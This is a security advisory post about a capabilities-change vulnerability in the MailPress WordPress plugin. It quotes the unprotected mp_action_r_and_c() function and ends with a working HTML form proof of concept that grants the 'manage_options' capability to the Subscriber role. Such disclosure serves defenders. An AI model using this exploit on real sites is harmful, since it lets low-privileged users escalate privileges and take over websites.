Capabilities Change Vulnerability in MailPress
As detailed in other post about a vulnerability in the MailPress plugin, we recently had a request for a file from that plugin on this website, which since we are not using the plugin, is usually an indication that someone is probing for usage of a plugin before exploiting something in it. While we could not find a vulnerability that we think would be the one that a hacker would be trying to exploit, we did find a local file inclusion vulnerability that is serious and exploitable in the plugin’s default state. We also found a capabilities change vulnerability that is exploitable in the plugin when one of the the plugin’s built-in addons, Roles_and_capabilities, is enabled. That vulnerability would be very serious if non trusted users had accounts on the website .
As mentioned in greater detail in the other post, through the file /mp-includes/action.php it is possible for anyone to make requests to functions that have names that start “mp_action_”. One such action is mp_action_r_and_c(), located in the file /mp-content/add-ons/MailPress_roles_and_capabilities.php. The function has no security checks in place as you can see below, so anyone can add or remove capabilities to WordPress roles if the addon is enabled:
88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 | public static function mp_action_r_and_c() { $rcs_option = 'MailPress_r&c_' . $_POST['role']; $r = get_role($_POST['role']); $rcs = get_option($rcs_option); if (empty($rcs)) $rcs = array(); if ($_POST['add']) { $rcs[$_POST['capability']] = 'on'; if ($r) $r->add_cap($_POST['capability']); } else { unset ($rcs[$_POST['capability']] ); if ($r) $r->remove_cap($_POST['capability']); } if (!add_option ($rcs_option, $rcs )) update_option ($rcs_option, $rcs); MP_::mp_die(1); } |
Using that someone with an account that has low level role could give that role capabilities that would normally only exist for higher level users. It also could be used to remove capabilities from higher level users, which could cause problems trying to manage a website.
Proof of Concept
The following proof of concept will add the “manage_options” capability to the Subscriber role.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/mailpress/mp-includes/action.php" method="POST" > <input type="hidden" name="action" value="r-and-c" /> <input type="hidden" name="role" value="subscriber" /> <input type="hidden" name="capability" value="manage_options" /> <input type="hidden" name="add" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html>